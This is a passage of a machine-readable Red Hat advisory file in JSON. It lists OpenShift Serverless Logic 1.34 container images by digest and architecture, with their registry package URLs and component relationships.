"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product_id": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8\u0026tag=1.34.0-2"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64"
},
"product_reference": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64"
},
"product_reference": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64"
},
"product_reference": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64"
},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64"
